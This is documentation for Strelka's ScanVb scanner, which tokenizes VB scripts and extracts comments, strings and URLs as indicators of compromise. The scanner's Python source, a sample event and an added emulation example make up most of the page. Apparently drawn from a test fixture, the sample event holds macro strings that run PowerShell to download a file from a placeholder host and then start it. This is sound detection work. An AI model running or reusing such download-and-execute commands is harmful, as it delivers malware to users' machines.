ScanVb

Scanner for Visual Basic (VB) script files.

This scanner parses VB script files to extract various components like comments, function names, strings, and URLs. It leverages the Pygments lexer for VB.NET to tokenize the script data and then extracts useful information from these tokens.

Attributes:

| Name | Type | Description |
| --- | --- | --- |
| lexer | | A Pygments lexer object for tokenizing VB.NET scripts. |
| url_regex | | A compiled regex pattern for extracting URLs from the script. |
Source code in strelka/src/python/strelka/scanners/scan_vb.py

```python
import re

import pygments
from pygments import formatters, lexers

from strelka import strelka


class ScanVb(strelka.Scanner):
    """
    Scanner for Visual Basic (VB) script files.

    This scanner parses VB script files to extract various components like comments,
    function names, strings, and URLs. It leverages the Pygments lexer for VB.NET to
    tokenize the script data and then extracts useful information from these tokens.

    Attributes:
        lexer: A Pygments lexer object for tokenizing VB.NET scripts.
        url_regex: A compiled regex pattern for extracting URLs from the script.
    """

    def init(self):
        # Called once by the strelka.Scanner base class when the scanner is loaded.
        # Initialize the lexer for VB.NET language using Pygments
        self.lexer = lexers.get_lexer_by_name("vbnet")
        # Regular expression to capture URLs, considering various schemes and TLDs.
        self.url_regex = re.compile(
            r'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))',
            re.IGNORECASE,
        )

    def scan(self, data, file, options, expire_at):
        """
        Scans the VB script file, tokenizes it, and extracts useful components.

        Args:
            data: Content of the file being scanned.
            file: File metadata.
            options: Scanner options.
            expire_at: Expiry timestamp of the scan task.
        """
        try:
            # Tokenize the script data using the Pygments lexer. RawTokenFormatter
            # emits one "<token type>\t<repr(value)>" line per token, as bytes.
            highlight = pygments.highlight(
                data, self.lexer, formatters.RawTokenFormatter()
            )
        except Exception as e:
            self.flags.append(f"highlighting_error: {str(e)[:50]}")
            return

        try:
            highlight_list = highlight.split(b"\n")
        except Exception as e:
            self.flags.append(f"highlight_split_error: {str(e)[:50]}")
            return

        # Initialize containers for script components
        ordered_highlights = []
        for hl in highlight_list:
            try:
                split_highlight = hl.split(b"\t")
                if len(split_highlight) == 2:
                    token, value = split_highlight
                    token = token.decode()
                    # Strip the quotes added by repr() and by VB string literals
                    value = value.decode().strip("'\"").strip()
                    # Add non-empty values to the ordered highlights
                    if value:
                        ordered_highlights.append({"token": token, "value": value})
            except Exception as e:
                self.flags.append(f"token_parsing_error: {str(e)[:50]}")

        # Initialize event fields to store extracted data
        self.event.setdefault("tokens", [])
        self.event.setdefault("comments", [])
        self.event.setdefault("functions", [])
        self.event.setdefault("names", [])
        self.event.setdefault("operators", [])
        self.event.setdefault("strings", [])
        self.event.setdefault("urls", [])

        # Get script length
        self.event["script_length_bytes"] = len(data)

        # Process and categorize each token
        try:
            for ohlp in ordered_highlights:
                self.categorize_token(ohlp)
        except Exception as e:
            self.flags.append(f"token_categorization_error: {str(e)[:50]}")

        # Remove duplicates and add URLs as IOCs
        try:
            if self.event["urls"]:
                self.event["urls"] = list(set(self.event["urls"]))
                self.add_iocs(self.event["urls"])
        except Exception as e:
            self.flags.append(f"ioc_extraction_error: {str(e)[:50]}")

    def categorize_token(self, ohlp):
        """
        Categorizes a token and extracts relevant information.

        Args:
            ohlp: A dictionary containing a token and its value.
        """
        token, value = ohlp["token"], ohlp["value"]
        if token not in self.event["tokens"]:
            self.event["tokens"].append(token)

        if token == "Token.Comment":
            if value not in self.event["comments"]:
                self.event["comments"].append(value)
            self.extract_urls(value)
        elif token == "Token.Name.Function":
            if value not in self.event["functions"]:
                self.event["functions"].append(value)
        elif token == "Token.Name":
            if value not in self.event["names"]:
                self.event["names"].append(value)
        elif token == "Token.Operator":
            if value not in self.event["operators"]:
                self.event["operators"].append(value)
        elif token == "Token.Literal.String":
            if value not in self.event["strings"]:
                self.event["strings"].append(value)
            self.extract_urls(value)

    def extract_urls(self, text):
        """
        Extracts URLs from the provided text using regex matching.

        Args:
            text: Text content from which URLs are to be extracted.
        """
        try:
            urls = self.url_regex.findall(text)
            for url in urls:
                if url not in self.event["urls"]:
                    self.event["urls"].append(url)
        except Exception as e:
            self.flags.append(f"url_extraction_error: {str(e)[:50]}")
```
scan(data, file, options, expire_at)

Scans the VB script file, tokenizes it, and extracts useful components.

Parameters:

| Name | Type | Description | Default |
| --- | --- | --- | --- |
| data | | Content of the file being scanned. | required |
| file | | File metadata. | required |
| options | | Scanner options. | required |
| expire_at | | Expiry timestamp of the scan task. | required |
categorize_token(ohlp)

Categorizes a token and extracts relevant information.

Parameters:

| Name | Type | Description | Default |
| --- | --- | --- | --- |
| ohlp | | A dictionary containing a token and its value. | required |
extract_urls(text)

Extracts URLs from the provided text using regex matching.

Parameters:

| Name | Type | Description | Default |
| --- | --- | --- | --- |
| text | | Text content from which URLs are to be extracted. | required |
Features
The features of this scanner are detailed below. These features represent the capabilities and the type of analysis the scanner can perform. This may include support for Indicators of Compromise (IOC), the ability to emit files for further analysis, and the presence of extended documentation for complex analysis techniques.
| Feature | Support |
| --- | --- |
| IOC Support | |
| Emit Files | |
| Extended Docs | |
| Malware Scanner | |
| Image Thumbnails | |
Tastes
Strelka's file distribution system assigns scanners to files based on 'flavors' and 'tastes'. Flavors describe the type of file, typically determined by MIME types from libmagic, matches from YARA rules, or characteristics of parent files. Tastes are the criteria used within Strelka to determine which scanners are applied to which files, with positive and negative tastes defining files to be included or excluded respectively.
| Source Filetype | Include / Exclude |
| --- | --- |
| hta_file | |
| vb_file | |
| vbscript | |
Scanner Fields
This section provides a list of fields that are extracted from the files processed by this scanner. These fields include the data elements that the scanner extracts from each file, representing the analytical results produced by the scanner. If the test file is missing or cannot be parsed, this section will not contain any data.
| Field Name | Field Type |
| --- | --- |
| comments | list |
| elapsed | str |
| flags | list |
| functions | list |
| iocs | str |
| names | list |
| operators | list |
| script_length_bytes | int |
| strings | list |
| tokens | list |
| urls | str |
Sample Event
Below is a sample event generated by this scanner, demonstrating the kind of output that can be expected when it processes a file. This sample is derived from a mock scan event configured in the scanner's test file. If no test file is available, this section will not display a sample event.
```python
test_scan_event = {
    "elapsed": 0.001,
    "flags": [],
    "comments": ["AutoOpen Macro"],
    "functions": ["AutoOpen", "Document_Open", "Testing_Iocs"],
    "names": [
        "Explicit",
        "MsgBox",
        "objWMIService",
        "GetObject",
        "objStartup",
        "Get",
        "objConfig",
        "SpawnInstance_",
        "ShowWindow",
        "objProcess",
        "ExecuteCmdAsync",
    ],
    "operators": ["="],
    "strings": [
        "Hello World!",
        "winmgmts:\\\\\\\\.\\\\root\\\\cimv2",
        "Win32_ProcessStartup",
        "winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_Process",
        "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\\\\test.txt\\nStart-Process -Filepath $env:tmp\\\\invoice.one",
        "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\\\\test.bat\\nStart-Process -Filepath $env:tmp\\\\test.bat",
    ],
    "script_length_bytes": 752,
    "tokens": [
        "Token.Keyword",
        "Token.Name",
        "Token.Text.Whitespace",
        "Token.Name.Function",
        "Token.Punctuation",
        "Token.Comment",
        "Token.Literal.String",
        "Token.Operator",
        "Token.Literal.Number.Integer",
    ],
    "urls": unordered(
        [
            "tmp\\\\invoice.one",
            "https://www.test.com/test.bat",
            "https://www.test.example.com",
        ]
    ),
    "iocs": unordered(
        [
            {
                "ioc": "www.test.example.com",
                "ioc_type": "domain",
                "scanner": "ScanVb",
            },
            {
                "ioc": "https://www.test.example.com",
                "ioc_type": "url",
                "scanner": "ScanVb",
            },
            {"ioc": "www.test.com", "ioc_type": "domain", "scanner": "ScanVb"},
            {
                "ioc": "https://www.test.com/test.bat",
                "ioc_type": "url",
                "scanner": "ScanVb",
            },
        ]
    ),
}
```
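The block below is an added example, not Strelka's code: it emulates the RawTokenFormatter line format on a constructed token stream, parses it the way the scanner does (quote stripping only) and also via `ast.literal_eval`, and runs a cut-down URL pattern over comments and strings. The sample tokens, the `raw_token_output` emulation, the three-TLD list and every function name are assumptions of this example.

```python
import ast
import re
from collections import defaultdict

# Constructed (token type, value) pairs standing in for what the Pygments VB.NET
# lexer yields for a short AutoOpen macro; not produced by running Pygments here.
SAMPLE_TOKENS = [
    ("Token.Comment", "' AutoOpen Macro"),
    ("Token.Text.Whitespace", "\n"),
    ("Token.Keyword", "Sub"),
    ("Token.Name.Function", "AutoOpen"),
    ("Token.Literal.String", '"winmgmts:\\\\.\\root\\cimv2"'),
    ("Token.Literal.String",
     '"cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com'
     ' -OutFile $env:tmp\\invoice.one"'),
    ("Token.Keyword", "End"),
]

# Cut-down stand-in for the scanner's URL regex: scheme URLs, or bare hostnames ending
# in one of three TLDs (the real pattern lists every IANA TLD, "one" included).
URL_RE = re.compile(
    r"(?:\b[a-z\d.-]+://[^<>\s()]+"
    r"|\b(?:[^\s!@#$%^&*()_=+\[\]{}|;:'\",.<>/?]+\.)+(?:com|net|one)(?!\w))",
    re.IGNORECASE,
)
# Token types the scanner keeps, and the event field each one lands in
BUCKETS = {"Token.Comment": "comments", "Token.Name.Function": "functions",
           "Token.Name": "names", "Token.Operator": "operators",
           "Token.Literal.String": "strings"}


def raw_token_output(tokens):
    """Emulate RawTokenFormatter: one '<type>\\t<repr(value)>' line per token, as bytes."""
    return b"".join(f"{ttype}\t{value!r}\n".encode() for ttype, value in tokens)


def parse_raw_tokens(raw, undo_repr=False):
    """Split raw token lines into (type, value) pairs. The scanner only strips quote
    characters (undo_repr=False), so repr() escapes such as a doubled backslash stay in
    the value; undo_repr=True applies ast.literal_eval first and recovers the text."""
    out = []
    for line in raw.split(b"\n"):
        parts = line.split(b"\t")
        if len(parts) != 2:
            continue
        value = parts[1].decode()
        if undo_repr:
            value = ast.literal_eval(value)
        value = value.strip("'\"").strip()
        if value:
            out.append((parts[0].decode(), value))
    return out


def categorize(parsed):
    """Bucket tokens as the scanner does and pull URLs out of comments and strings."""
    event = defaultdict(list)
    for token, value in parsed:
        if token not in event["tokens"]:
            event["tokens"].append(token)
        bucket = BUCKETS.get(token)
        if bucket and value not in event[bucket]:
            event[bucket].append(value)
        if bucket in ("comments", "strings"):
            for url in URL_RE.findall(value):
                if url not in event["urls"]:
                    event["urls"].append(url)
    return dict(event)


def scan_sample(undo_repr=False):
    """Run the whole pipeline over the constructed tokens and return the event dict."""
    return categorize(parse_raw_tokens(raw_token_output(SAMPLE_TOKENS), undo_repr))
```

With quote stripping only, the winmgmts string keeps its repr()-doubled backslashes, which is why the sample event above stores it that way; `tmp\invoice.one` is reported as a URL under both decodings because the bare-hostname alternative accepts backslashes in a label and `.one` is a TLD, so Windows paths whose extension is also a TLD surface as URL IOC candidates.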